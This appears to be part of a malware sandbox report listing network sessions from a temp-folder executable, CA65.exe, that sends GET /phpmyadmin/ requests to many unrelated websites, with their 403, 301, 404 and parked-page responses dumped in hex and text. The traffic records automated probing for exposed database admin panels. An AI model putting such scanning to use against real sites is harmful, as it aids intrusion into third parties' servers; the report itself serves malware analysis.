2023-12-22 20:14:51 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_OABRy38Yfct2NjyV0qT3hLlxqiNV5fOJkh/9lSuZgTnzy5mzYgWOAsLxvDu99xUmiU0kqEVury+bzqXB1GWG7g Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:51 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	54964	104.26.0.173	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	178	OUT	GET /phpmyadmin/ HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	585	IN	HTTP/1.1 403 Forbidden Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 94 Connection: close X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QnhRNkw%2FW910nz%2BnsHoZ3E6b4yjYBNJVoqttGCZHS%2FLJTTt%2FJ9qUF4t5d0wNHZwa8vR8ZJkgtZ23%2FGgxXdYMq1twYq67fJKjTTX%2BBBHk657b6%2BcJvO%2FeFcdUzrNpQQdQPTmS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08916f87225d-MIA
2023-12-22 20:14:51 UTC	94	IN	Data Raw: 46 6f 72 20 73 65 63 75 72 69 74 79 20 72 65 61 73 6f 6e 73 2c 20 74 68 69 73 20 55 52 4c 20 69 73 20 6f 6e 6c 79 20 61 63 63 65 73 73 69 62 6c 65 20 75 73 69 6e 67 20 6c 6f 63 61 6c 68 6f 73 74 20 28 31 32 37 2e 30 2e 30 2e 31 29 20 61 73 20 74 68 65 20 68 6f 73 74 6e 61 6d 65 2e Data Ascii: For security reasons, this URL is only accessible using localhost (127.0.0.1) as the hostname.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	54760	3.33.130.190	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	172	OUT	GET /phpmyadmin/ HTTP/1.1 Host: loghole.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_gj9TE5H0bBFtZVPMzosSUgvbqcP9jOzwf/4a6qSbU/RYiuzEtrlvjPKxgAbj+0XrstfpRb5uTmKnY0i8nKA//Q Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:51 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	54257	192.124.249.58	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	177	OUT	GET /phpmyadmin/ HTTP/1.1 Host: tgeddesgrant.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	353	IN	HTTP/1.1 403 Forbidden Server: Sucuri/Cloudproxy Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Sucuri-ID: 17008 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: upgrade-insecure-requests; X-Sucuri-Block: IPB17
2023-12-22 20:14:51 UTC	2369	IN	Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 Data Ascii: 308<!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" href="https://cdn.sucuri.net/sucuri-firewall-block.css" /><section class="center clearfix"><meta name="viewport" content="width=device-width, initia

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	54973	141.193.213.10	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	172	OUT	GET /phpmyadmin/ HTTP/1.1 Host: jaydien.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	523	IN	HTTP/1.1 403 Forbidden Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html Content-Length: 146 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Set-Cookie: __cf_bm=w9.GW06NR4g2kM1PbvVYKsdA_gFIiE5IgEBUQjdJrVg-1703276091-1-AWhbR+/b8v1SSkzP1pOYgjSkkrUUU2XyGgv973YwEssQNrLxJgtBmXac+w2A0rQFB0r7rZpmmwLlYeSu18s5jhs=; path=/; expires=Fri, 22-Dec-23 20:44:51 GMT; domain=.jaydien.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 839b0891ff79dadd-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:14:51 UTC	146	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	54382	104.17.71.73	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: liberty25.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	689	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Length: 0 Connection: close Location: https://www.liberty25.org/phpmyadmin/ Set-Cookie: __cf_bm=Mr7liE5R.aLYKQbeRzXeBQtbVe4Y_ihQqrSFn.H1rMw-1703276091-1-AeA1g101VbceZhpcHFMIiLxSDosHM4U3kUoUGhUr84Y19L6SpxWeNOPXAgFDz8DdogFzkLwsqTh8mVyq+jr0wvI=; path=/; expires=Fri, 22-Dec-23 20:44:51 GMT; domain=.liberty25.org; HttpOnly; Secure; SameSite=None Strict-Transport-Security: max-age=31536000 Set-Cookie: __cfruid=36ce27554c1b5fa0a3332a6f3933e64f08535353-1703276091; path=/; domain=.liberty25.org; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 839b0891b8db7421-MIA alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	53889	104.24.82.4	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	175	OUT	GET /phpmyadmin/ HTTP/1.1 Host: thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	627	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close location: https://www.thenile.com.au/phpmyadmin/ via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nElqA0aMFrHy7BXt%2FZOFzXBDcCT0HVklTmPTN4Sz1E4KceWU03WD4eH6XG7Qa7VTfoGtaSSC1v1dQzjcy0qx3C9PZ%2Bxst%2B3eX77j%2BjMjQY2pUP7rpKBwt3W2tucso9vY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b0891bc98da93-MIA
2023-12-22 20:14:51 UTC	252	IN	Data Raw: 66 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: f6<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.thenile.com.au/phpmyadmin/">here</a>.</p></body></html>
2023-12-22 20:14:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	54266	13.248.169.48	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	186	OUT	GET /phpmyadmin/ HTTP/1.1 Host: customizedperformance.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html Content-Length: 12976 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-32b0" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_QRMpUPfpzLBsnmjFgEoWtPjJM78QNZQO1E4zwpkaXX5Darpl9d4+iQFWpmnneewYLzpa9Zl3LxfuiwqSri+HEg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:51 UTC	12976	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	53891	23.229.226.96	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	181	OUT	GET /phpmyadmin/ HTTP/1.1 Host: derrickandbriggs.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	407	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:51 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://derrickandbriggs.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:14:51 UTC	7785	IN	Data Raw: 32 30 64 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 Data Ascii: 20d5<!doctype html><html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1"><title>Page not found - Derrick & B
2023-12-22 20:14:51 UTC	626	IN	Data Raw: 72 72 69 63 6b 61 6e 64 62 72 69 67 67 73 2e 63 6f 6d 2f 72 65 73 6f 75 72 63 65 73 2f 22 3e 52 65 73 6f 75 72 63 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 6e 61 76 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 64 2d 62 61 72 22 3e 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 68 65 61 64 65 72 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 22 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 5b 45 72 72 6f 72 20 34 30 34 20 2d 20 66 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 5d 3c 2f 68 32 3e 0a 09 09 09 3c 70 3e 53 6f 72 72 79 2c 20 74 68 65 20 63 6f 6e 74 65 6e 74 20 79 6f 75 20 Data Ascii: rrickandbriggs.com/resources/">Resources</a></li></ul></div></div></nav><div class="red-bar"></div></div></div></header><div id="main" class="content"><h2>Oops! [Error 404 - file not found]</h2><p>Sorry, the content you
2023-12-22 20:14:51 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:14:51 UTC	6623	IN	Data Raw: 31 39 64 32 0d 0a 3c 64 69 76 20 69 64 3d 22 74 65 78 74 2d 32 22 20 63 6c 61 73 73 3d 22 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 77 69 64 67 65 74 5f 74 65 78 74 22 3e 3c 68 34 20 63 6c 61 73 73 3d 22 77 69 64 67 65 74 2d 74 69 74 6c 65 22 3e 50 68 6f 6e 65 3c 2f 68 34 3e 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 77 69 64 67 65 74 22 3e 3c 70 3e 34 30 35 2d 32 33 35 2d 31 39 30 30 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 74 65 78 74 2d 33 22 20 63 6c 61 73 73 3d 22 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 77 69 64 67 65 74 5f 74 65 78 74 22 3e 3c 68 34 20 63 6c 61 73 73 3d 22 77 69 64 67 65 74 2d 74 69 74 6c 65 22 3e 46 61 78 3c 2f 68 34 3e 09 09 09 3c 64 69 76 20 63 6c 61 Data Ascii: 19d2<div id="text-2" class="widget-container widget_text"><h4 class="widget-title">Phone</h4><div class="textwidget"><p>405-235-1900</p></div></div><div id="text-3" class="widget-container widget_text"><h4 class="widget-title">Fax</h4><div cla

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	53795	3.126.94.219	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: indfos.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	820	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:48 GMT Server: web Content-Type: text/html; charset=UTF-8 Location: http://indfos.com/phpmyadmin X-UA-Compatible: IE=edge strict-transport-security: max-age=31536000; includeSubDomains; Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: ; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline'; Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XXS-Protection: 1; mode=block X-Powered-By: ARR/3.0 Content-Length: 151 Connection: close
2023-12-22 20:14:51 UTC	151	IN	Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 69 6e 64 66 6f 73 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="http://indfos.com/phpmyadmin">here</a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	53817	213.186.33.19	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: esisalama.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	164	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 196 Connection: close Server: Apache
2023-12-22 20:14:51 UTC	196	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	54460	34.136.28.237	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	176	OUT	GET /phpmyadmin/ HTTP/1.1 Host: ispsolucoes.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
